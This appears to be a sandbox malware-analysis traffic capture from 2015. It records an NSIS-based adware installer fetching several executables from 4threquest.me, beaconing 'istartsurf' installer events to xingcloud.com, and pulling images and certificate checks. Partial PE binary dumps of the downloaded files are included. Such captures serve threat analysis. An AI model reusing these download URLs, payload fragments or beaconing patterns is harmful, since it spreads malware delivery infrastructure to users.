lass 3 Code Signing 2009-2 OCSP Responder0.."0...*.H.............0....
.........m5*R........2....>...yU4..L.. ...........u..Hez..Pn.....d.
..nz(...V7.}^...d!RX...bl..[..a...L.. .~..Ij......%..%p.-...u..:..i..F
*]...*....{NH..|0...gHX.Q.r....S..........._.9.(w...suC...N..s.....&."
...:.C.Q.i~rl..<..krS..8.B..o][email protected]
...U....0.0....U. ...0..0....`.H...E....0..0(.. .........hXXps://VVV.v
erisign.com/CPS0b.. .......0V0...VeriSign, Inc.0.....=VeriSign's CPS i
ncorp. by reference liab. ltd. (c)97 VeriSign0...U.%..0... .......0...
U........0... .....0......0"..U....0...0.1.0...U....TGV-B-32010...
<<< skipped >>>


GET /v4/sof-installer/535559167_198339_B48A115F?action=pcm.installer.istartsurf.ChromeSync HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Pi/3.1415926
Host: xa.xingcloud.com


HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 30 Apr 2015 23:07:39 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
48..{"stats":"ok","time":"1.20 ms","message":"store 1 action and 0 upd
ate "}..0..



GET /v4/sof-installer/535559167_198339_B48A115F?action=pcm.installer.istartsurf.regok HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Pi/3.1415926
Host: xa.xingcloud.com


HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 30 Apr 2015 23:07:21 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
48..{"stats":"ok","time":"0.63 ms","message":"store 1 action and 0 upd
ate "}..0..HTTP/1.1 200 OK..Server: nginx/0.7.67..Date: Thu, 30 Apr 20
15 23:07:21 GMT..Content-Type: text/html; charset=utf-8..Transfer-Enco
ding: chunked..Connection: keep-alive..X-Powered-By: PHP/5.3.3..xa-api
-version: v4..48..{"stats":"ok","time":"0.63 ms","message":"store 1 ac
tion and 0 update "}..0..



GET //MEQwQjBAMD4wPDAJBgUrDgMCGgUABBTkIInKBAzXkF0Qh0pel3lfHJ9GPAQU0sSw0pHUTBFxs2HLPaH+3ahq1OMCAxvnFQ== HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.godaddy.com


HTTP/1.1 200 OK
Date: Thu, 30 Apr 2015 23:11:52 GMT
Server: Apache
Content-Transfer-Encoding: Binary
Cache-Control: max-age=120329, public, no-transform, must-revalidate
Last-Modified: Thu, 30 Apr 2015 22:22:55 GMT
Expires: Sat, 02 May 2015 10:22:55 GMT
ETag: "c6961d1bde2c92575adba40476a0f961c1ef5e15"
Content-Length: 1708
Connection: close
Content-Type: application/ocsp-response
0..........0..... .....0......0...0......0..1.0...U....US1.0...U....Ar
izona1.0...U....Scottsdale1.0...U....GoDaddy.com, Inc.100...U...'Go Da
ddy Root Validation Authority - G1..20150430222255Z0f0d0<0... .....
.... ......]..J^.y_..F<........L.q.a.=....j...........2015043022225
5Z....20150502102255Z0...*.H..............z...ue.`iK..sr.Q.2.....)q7..
..c........(.".....eZ..<..9$....]..Ws. [email protected].;...h..58.z.
........g.......y.......#. ....U.v........;.".U`....O...l3.$$..-L\.i9.
#{tlf{.[J.R..RO.u....Te.\L.....?U..vM.q..%..5..b...[..h-.F.c...v.iz...
..BS.h`.td.....W..Z....m0..i0..e0..M...........T.m^'0...*.H........0c1
.0...U....US1!0...U....The Go Daddy Group, Inc.110/..U...(Go Daddy Cla
ss 2 Certification Authority0...150316070000Z..160316070000Z0..1.0...U
....US1.0...U....Arizona1.0...U....Scottsdale1.0...U....GoDaddy.com, I
nc.100...U...'Go Daddy Root Validation Authority - G10.."0...*.H......
.......0.........xo(....QQ.`L.~...&...a.F.=.....d=....."......?...\...
.......b.D....l=.HS.N......A..;....C)...(..T........XA-N....k1 .....ag
...,4.L{.I..hEKb..K.....HTTP/1.1 200 OK..Date: Thu, 30 Apr 2015 23:11:
52 GMT..Server: Apache..Content-Transfer-Encoding: Binary..Cache-Contr
ol: max-age=120329, public, no-transform, must-revalidate..Last-Modifi
ed: Thu, 30 Apr 2015 22:22:55 GMT..Expires: Sat, 02 May 2015 10:22:55 
GMT..ETag: "c6961d1bde2c92575adba40476a0f961c1ef5e15"..Content-Length:
 1708..Connection: close..Content-Type: application/ocsp-response..0..
........0..... .....0......0...0......0..1.0...U....US1.0...U....A
<<< skipped >>>


GET /310714d/310714_cr.exe?g3CvT78vSMa0N0LPai7Qvt=g3CvT78vSMa0N0LPai7Qvt HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.4threquest.me
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 30 Apr 2015 23:07:42 GMT
Content-Type: application/octet-stream
Content-Length: 1085040
Last-Modified: Thu, 30 Apr 2015 23:07:02 GMT
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
CC: UA
Accept-Ranges: bytes
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..i
u..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i..................
......PE..L......K.................\..........<2.......p....@......
....................................................................s.
......................................................................
................p...............................text...ZZ.......\.....
............. ..`.rdata.......p.......`..............@[email protected]........
[email protected][email protected]
rc................v..............@..@.................................
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U....\.}..t .}.F.E.u..H
.....>[email protected].>[email protected].
P.u...Pr@..}[email protected]... M.......M....3.....FQ.....N
U..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u
[email protected]}[email protected].}.j.W.E......E.......P
[email protected]@[email protected] [email protected]..
.\r@._^3.[.....L$...>B...Si.....VW.T.....tO.q.3.;5.>B.sB..i.....
.D.......t.G.....t...O..t .....u...3....3...F.....;5.>B.r._^[..
<<< skipped >>>

GET /310714d/291014_nj.exe?g3CvT78vSMa0N0LPai7Qvt=g3CvT78vSMa0N0LPai7Qvt HTTP/1.1


User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.4threquest.me
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 30 Apr 2015 23:07:47 GMT
Content-Type: application/force-download
Connection: keep-alive
X-Powered-By: PHP/5.4.30
Content-Length: 1985320
Content-Description: File Transfer
Content-Disposition: attachment; filename="291014_nj.exe"
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
X-Cache: BYPASS
CC: UA
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..i
u..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i..................
......PE..L......K.................\..........<2.......p....@......
....................................................................s.
.........h............................................................
................p...............................text...ZZ.......\.....
............. ..`.rdata.......p.......`..............@[email protected]........
[email protected][email protected]
rc...h............v..............@..@.................................
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U....\.}..t .}.F.E.u..H
.....>[email protected].>[email protected].
P.u...Pr@..}[email protected]... M.......M....3.....FQ.....N
U..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u
[email protected]}[email protected].}.j.W.E......E.......P
[email protected]@[email protected] [email protected]..
.\r@._^3.[.....L$...>B...Si.....VW.T.....tO.q.3.;5.>B.sB..i.....
.D.......t.G.....t...O..t .....u...3....3...F.....;5.>B.r._^[..
<<< skipped >>>

GET /310714d/310714_gs.exe?g3CvT78vSMa0N0LPai7Qvt=g3CvT78vSMa0N0LPai7Qvt HTTP/1.1


User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.4threquest.me
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 30 Apr 2015 23:07:47 GMT
Content-Type: application/octet-stream
Content-Length: 1112422
Last-Modified: Thu, 30 Apr 2015 23:07:02 GMT
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
CC: UA
Accept-Ranges: bytes
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..i
u..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i..................
......PE..L......K.................\..........<2.......p....@......
....................................................................s.
.........H............................................................
................p...............................text...ZZ.......\.....
............. ..`.rdata.......p.......`..............@[email protected]........
[email protected][email protected]
rc...H............v..............@..@.................................
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U....\.}..t .}.F.E.u..H
.....>[email protected].>[email protected].
P.u...Pr@..}[email protected]... M.......M....3.....FQ.....N
U..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u
[email protected]}[email protected].}.j.W.E......E.......P
[email protected]@[email protected] [email protected]..
.\r@._^3.[.....L$...>B...Si.....VW.T.....tO.q.3.;5.>B.sB..i.....
.D.......t.G.....t...O..t .....u...3....3...F.....;5.>B.r._^[..
<<< skipped >>>

GET /010914s/verificar_ip.php HTTP/1.1


Accept: */*
Referer: hXXp://VVV.4threquest.me/010914s/010914i.htm
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.4threquest.me
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 30 Apr 2015 23:07:48 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.30
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
X-Cache: BYPASS
CC: UA
Content-Encoding: gzip
18............s.......X.......0..



GET /img/Global/Yes_Button.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: img.beyabir.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Thu, 30 Apr 2015 23:07:08 GMT
Content-Type: image/png
Content-Length: 1091
Connection: keep-alive
x-amz-id-2: FufJylo2h0LlgAvBhv6FKeS8RiEbjEd6iaXEFUTvT/OyG ZgeEaS5ooHNe8/F0Le
x-amz-request-id: 69875246E7628FFF
x-amz-meta-s3fox-filesize: 1091
x-amz-meta-s3fox-modifiedtime: 1380713503006
Last-Modified: Wed, 13 Nov 2013 16:12:48 GMT
x-amz-version-id: .ffwqW.8iCK2_zdeBNvgWdy.OnUDjeHF
ETag: "3f27a393967d84f83a317f40351c0065"
Accept-Ranges: bytes
.PNG........IHDR...T.........d.......tEXtSoftware.Adobe ImageReadyq.e&
lt;..."iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCe
hiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk=
"Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> &
lt;rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#">
 <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1
.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http:/
/ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photo
shop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:2D2B0E0924EA11E392EFCCF1
BDECC388" xmpMM:DocumentID="xmp.did:2D2B0E0A24EA11E392EFCCF1BDECC388"&
gt; <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:2D2B0E0724EA11E392
EFCCF1BDECC388" stRef:documentID="xmp.did:2D2B0E0824EA11E392EFCCF1BDEC
C388"/> </rdf:Description> </rdf:RDF> </x:xmpmeta>
; <?xpacket end="r"?>..&X....IDATx...1..0.E.......... .d.6\.&.ND
H.v....9.{....)...D$k...O...T.[Sl.I....K.....S3..fB...2?w.....2...../=
#.3.E(B...E(B...E( ...E(..Z..f..)U..l9.....7...........I..w...).u*..P#
G...?...%....\.l....IEND.B`.....
<<< skipped >>>

GET /img/Global/Yes_Button_Hover.png HTTP/1.1


Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: img.beyabir.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Thu, 30 Apr 2015 23:07:08 GMT
Content-Type: image/png
Content-Length: 1094
Connection: keep-alive
x-amz-id-2: ZH/H/BrlB90f12Jgses7dcqPxryj5NnMS0cI2SxwLBB85Qfj2OXlGAsGTEDmcFC7
x-amz-request-id: 91A6ABE35D0A7569
x-amz-meta-s3fox-filesize: 1094
x-amz-meta-s3fox-modifiedtime: 1380713503000
Last-Modified: Wed, 13 Nov 2013 16:12:44 GMT
x-amz-version-id: L9RQqPthtuNtMC55hxM9o_RZqWXqZtid
ETag: "aec475b9d6280598800f3ceafea4af8c"
Accept-Ranges: bytes
.PNG........IHDR...T.........d.......tEXtSoftware.Adobe ImageReadyq.e&
lt;..."iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCe
hiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk=
"Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> &
lt;rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#">
 <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1
.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http:/
/ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photo
shop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:30B2AE2724EA11E392EFCCF1
BDECC388" xmpMM:DocumentID="xmp.did:30B2AE2824EA11E392EFCCF1BDECC388"&
gt; <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:30B2AE2524EA11E392
EFCCF1BDECC388" stRef:documentID="xmp.did:30B2AE2624EA11E392EFCCF1BDEC
C388"/> </rdf:Description> </rdf:RDF> </x:xmpmeta>
; <?xpacket end="r"?>. ,.....IDATx......0.E..D....@L.^L...!...2.
..........=.....vq?.H.l4[.v..d.S.l......x..W{=..k...L(..3.....k.s..3..
.K....B..P..B..P@(B...E(B..u.f4.3..)e..l9z.i.?o..7.7M.....%...y..$.:.t
A..K........S..^/......IEND.B`.....
<<< skipped >>>

GET /img/Global/No_Button_Hover.png HTTP/1.1


Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: img.beyabir.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Thu, 30 Apr 2015 23:07:08 GMT
Content-Type: image/png
Content-Length: 1091
Connection: keep-alive
x-amz-id-2: w8MZLmVYoBIXBjhf7AX2 gI11HEATjoL7xzl5WiqPif2jl7PuO2tfCE3vWAz3tzG
x-amz-request-id: E9FC3602133605A0
x-amz-meta-s3fox-filesize: 1091
x-amz-meta-s3fox-modifiedtime: 1380713503004
Last-Modified: Wed, 13 Nov 2013 16:12:47 GMT
x-amz-version-id: wNmfJwpUmazhRatL.BZxBG0x.XZldhEV
ETag: "6d55a62314755c1454569b2b098a3a9f"
Accept-Ranges: bytes
.PNG........IHDR...T.........d.......tEXtSoftware.Adobe ImageReadyq.e&
lt;..."iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCe
hiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk=
"Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> &
lt;rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#">
 <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1
.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http:/
/ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photo
shop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:30B2AE2324EA11E392EFCCF1
BDECC388" xmpMM:DocumentID="xmp.did:30B2AE2424EA11E392EFCCF1BDECC388"&
gt; <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:30B2AE2124EA11E392
EFCCF1BDECC388" stRef:documentID="xmp.did:30B2AE2224EA11E392EFCCF1BDEC
C388"/> </rdf:Description> </rdf:RDF> </x:xmpmeta>
; <?xpacket end="r"?>........IDATx...1..0.E........8A9?=..h'.NDH
.v..b $.{....)...D$j...O;.v...I6....../.s.....f....2.>.......1..?..
...... ...E( ....."...P."..PWhFC1...R.N...g......~.9h..~*.\.Q..3l'....
.B.\.W...`.............IEND.B`.....
<<< skipped >>>

GET /img/Rerarapepe/logo.png HTTP/1.1


Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: img.beyabir.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Thu, 30 Apr 2015 23:07:08 GMT
Content-Type: image/png
Content-Length: 10944
Connection: keep-alive
x-amz-id-2: fttMRbWgO3QO0vLVbufMGrfOzBMWbPdneAkQOk8G/aPTYMrgBtiQS33MCTm hCu0
x-amz-request-id: 1D23872D552BD286
x-amz-meta-s3fox-filesize: 10944
x-amz-meta-s3fox-modifiedtime: 1384099835051
Last-Modified: Tue, 12 Nov 2013 11:05:48 GMT
x-amz-version-id: bDPFTNRsfueKXbAbmeVgRbPvzBoRvTw2
ETag: "0440e25b659207aaea00512d9a0a9924"
Accept-Ranges: bytes
.PNG........IHDR...L...^...........*.IDATx....T.....M...F."b.....F.Q..
..{.%..{E.........{.H....J.~*.....gN..j....._.Z..g..ff.....9C."..t:]'.
F3-55uOjZz.......o....\...'....&J4[O*.=i.`%Y...................E."....
.Z.>.69%;6.....HNIEFf&.J.,..r~..}.p).....e..V...3./)....A\|........
......   k,Q...M..B..h....../..N........#..!V.P.y'X4J...v...Z...o.{ ''
....L9....M.....7...l....Ml..SS..........$..C!.3.\...........A.'......
.m_..%x...."@....)V%.?|WX...Y\.C.c.r.V..R....g...:.\2....4..M.R9X..b..
.b......,.U..t.b...Z...P..Q*......7.......t.B.{....@jY!.....Q......Tdk
...3;...s..0... ....@.&..m.ktE.f. I.M..1...`..V..d[.9..qG.&".U..C..u..
.W.C{..4'..v?.....\..>......h<.C{.(4...u...G..E=Gvj..7[.?.:.?.K.
9...e..s........,--=....[W'...v......R....^<...!..]........>..j.
.......].v.....j.v..l.j.V.wn.j.&(I.][.r...Q.x..>....Hay...99f..;.%.
.R..Q_...h4Sy...a]....J.dQ..o........... 9...8.2Br..)...a)w..]...h.f.K
.}#i.T[.......u..(.;.....d=....,..{....Z..._.Q..t:... ..H.R..Wt.f^...'
6.Xu.\.DU*...u.oAK....&KQ.# .%.Q..f......{34.-.>.M............6'(.8
@.y..Z.......$.UP:...i.../..5....V:..\[email protected]'@B.:..f.\..,......17.....
..&.Qn..t..DJ.~w..z.j..........e.Q......&..tX...s.5s*..OA...HY......c.
..d@. .\[email protected][)...!h..P..r..,A...A..b......O.Oyr.i..".*....
m.EA8...r....T.6H.DP.....n.y=4.LG..1m2N.n.G.rX..........?.....5%mp.A=.
[email protected]/....J.r!..W.t..r.#Y..J.g.c...{.H,N...>r..lY.'.4....
.m.....D.t..YT.d. hN..P.K`.....%\..a-..~....l..s....?...5....8..P... .
.....5.............3u"...#s..(....7@R,.....Es.9..(...m#k.8...tiP..
<<< skipped >>>

GET /img/Rerarapepe/Rerarapepe3.jpg HTTP/1.1


Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: img.beyabir.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Thu, 30 Apr 2015 23:07:08 GMT
Content-Type: image/jpeg
Content-Length: 15799
Connection: keep-alive
x-amz-id-2: v/KJyRQPRqGzp68fMREpMsXVlN8ZGENjPJZ3xLLc6RX9mf6LfR53urxF4AogH8OE
x-amz-request-id: 10317CBB850CD0F8
x-amz-meta-s3fox-filesize: 15799
x-amz-meta-s3fox-modifiedtime: 1394538949746
Last-Modified: Tue, 11 Mar 2014 11:56:45 GMT
x-amz-version-id: zPl9IpmeaG3ff3qZpgvUQzMtoydG8QKH
ETag: "3e2809731062d36b6ae81e70aef3b785"
Accept-Ranges: bytes
......Exif..II*.................Ducky.......<.....ohXXp://ns.adobe.
com/xap/1.0/.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?&g
t; <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-
c011 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF xmlns:rdf
="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description
 rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRe
f="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://n
s.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:F7DDEC055CA8E3
11B43CF856625B69D6" xmpMM:DocumentID="xmp.did:08AEC486A91411E3A978EB31
6F7617DC" xmpMM:InstanceID="xmp.iid:08AEC485A91411E3A978EB316F7617DC" 
xmp:CreatorTool="Adobe Photoshop CS6 (Windows)"> <xmpMM:DerivedF
rom stRef:instanceID="xmp.iid:B1126B7673A8E311B43CF856625B69D6" stRef:
documentID="xmp.did:F7DDEC055CA8E311B43CF856625B69D6"/> </rdf:De
scription> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"
?>....Adobe.d......................................................
......................................................................
.......................0..............................................
..........................................!..1A..Qaq"..2R.......r.#S.T
.B.$4..3s...bCdt%U....c......................!1..AQ...aq..."2R......b3
..B.r................?..J. ..U.@@@@@@@A...."...            .a.....    
  ..U.@@@A.A.]A....Dq.....p:QS...C.u.....|OZ...D<[email protected].#.....E_
....:......:.<GZ...A..Z*...C.u.x.......:.e..27...EwQ..z........
<<< skipped >>>

GET /img/Rerarapepe/Rerarapepe_b.png HTTP/1.1


Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: img.beyabir.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Thu, 30 Apr 2015 23:07:08 GMT
Content-Type: image/png
Content-Length: 5163
Connection: keep-alive
x-amz-id-2: AjQL4y8fLzMBXjBcq1riQXu6lrQMz5eIxeZcrvBO8swbGl1434gYRzLcefkTkD6R
x-amz-request-id: D515F0C8C6C1D704
x-amz-meta-s3fox-filesize: 5163
x-amz-meta-s3fox-modifiedtime: 1402217717749
Last-Modified: Mon, 09 Jun 2014 14:41:12 GMT
x-amz-version-id: KNAPX8e2AxH1Bx9jEBmu7jKCGa_97Tvk
ETag: "297eebd38313ee5b5ce0639f28ef2690"
Accept-Ranges: bytes
..2u..wJ0..0..1p..OO...j....u.`{..'.,.4...........m......&......0...p.
.O|f.s.....W<....v.5..]....{v....S....>..m..n}.cW7....^....].a.y
....K.wR#q.........i\.C.>........%.e1>1..C..~...`.#.|....{w..t..
.%l"?..."......#...ft..Wt.;3|.-.J&..Mj.T]..[...S....x.5O.f.S.o.. I^...
..Y.)......l.....6K.q.Jy~{R...t..z....d,........N.Nj...... Y... ....D.
..K...C......7p...V?.j..^..kH.i..G7.3...u..(.#..i..`....2 V....D...w..
?.Wt .k.b.n.H.1..l4...p..U.T~.....T.@v.... ....iJ.f\C..O........-.....
...<V...W.K.....\...7Qu.ny.5.N..ZE...|..f"...e.... R. .ha....e...5.
O.O#LiV..F..q..ws...!.o...x.Gj.....LP..l..C'z.|.....t...(....!.RE.t..1
yx{.$_..../i....E...I.a.......DL.>s.........R 0.E..R.1.Q...D..m=@..
.N8...R..|.v-?N...c9,..V-S6o2~..`.5.tk...f...v..<.0(..1.T...n..7...
y.i.r... .._.P..c......IEND.B`...2u..wJ0..0..1p..OO...j....u.`{..'.,.4
...........m......&......0...p..O|f.s.....W<....v.5..]....{v....S..
..>..m..n}.cW7....^....].a.y....K.wR#q.........i\.C.>........%.e
1>1..C..~...`.#.|....{w..t...%l"?..."......#...ft..Wt.;3|.-.J&..Mj.
T]..[...S....x.5O.f.S.o.. I^.....Y.)......l.....6K.q.Jy~{R...t..z....d
,........N.Nj...... Y... ....D...K...C......7p...V?.j..^..kH.i..G7.3..
.u..(.#..i..`....2 V....D...w..?.Wt .k.b.n.H.1..l4...p..U.T~.....T.@v.
... ....iJ.f\C..O........-........<V...W.K.....\...7Qu.ny.5.N..ZE..
.|..f"...e.... R. .ha....e...5.O.O#LiV..F..q..ws...!.o...x.Gj.....LP..
l..C'z.|.....t...(....!.RE.t..1yx{.$_..../i....E...I.a.......DL.>s.
........R [email protected]..|.v-?N...c9,..V-S6o2~..`.5
<<< skipped >>>


GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab?e38c9f6a9f564146 HTTP/1.1
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Tue, 24 Feb 2015 00:37:01 GMT
If-None-Match: "80b4d90ca4fd01:0"
User-Agent: Microsoft-CryptoAPI/6.1
Host: ctldl.windowsupdate.com


HTTP/1.1 304 Not Modified
Content-Type: application/octet-stream
Last-Modified: Tue, 24 Feb 2015 00:37:01 GMT
ETag: "80b4d90ca4fd01:0"
Cache-Control: max-age=604800
Date: Thu, 30 Apr 2015 23:11:47 GMT
Connection: keep-alive
HTTP/1.1 304 Not Modified..Content-Type: application/octet-stream..Las
t-Modified: Tue, 24 Feb 2015 00:37:01 GMT..ETag: "80b4d90ca4fd01:0"..C
ache-Control: max-age=604800..Date: Thu, 30 Apr 2015 23:11:47 GMT..Con
nection: keep-alive..



GET /v4/sof-installer/535559167_198339_B48A115F?action=pcm.installer.istartsurf.ClearnC HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Pi/3.1415926
Host: xa.xingcloud.com


HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 30 Apr 2015 23:07:33 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
48..{"stats":"ok","time":"0.62 ms","message":"store 1 action and 0 upd
ate "}..0..HTTP/1.1 200 OK..Server: nginx/0.7.67..Date: Thu, 30 Apr 20
15 23:07:33 GMT..Content-Type: text/html; charset=utf-8..Transfer-Enco
ding: chunked..Connection: keep-alive..X-Powered-By: PHP/5.3.3..xa-api
-version: v4..48..{"stats":"ok","time":"0.62 ms","message":"store 1 ac
tion and 0 update "}..0......


GET /v4/sof-installer/535559167_198339_B48A115F?action=pcm.installer.istartsurf.wpm HTTP/1.1


Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Pi/3.1415926
Host: xa.xingcloud.com


HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 30 Apr 2015 23:07:34 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
48..{"stats":"ok","time":"0.74 ms","message":"store 1 action and 0 upd
ate "}..0..HTTP/1.1 200 OK..Server: nginx/0.7.67..Date: Thu, 30 Apr 20
15 23:07:34 GMT..Content-Type: text/html; charset=utf-8..Transfer-Enco
ding: chunked..Connection: keep-alive..X-Powered-By: PHP/5.3.3..xa-api
-version: v4..48..{"stats":"ok","time":"0.74 ms","message":"store 1 ac
tion and 0 update "}..0......


GET /v4/sof-installer/535559167_198339_B48A115F?action=pcm.installer.istartsurf.ient HTTP/1.1


Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Pi/3.1415926
Host: xa.xingcloud.com


HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 30 Apr 2015 23:07:38 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
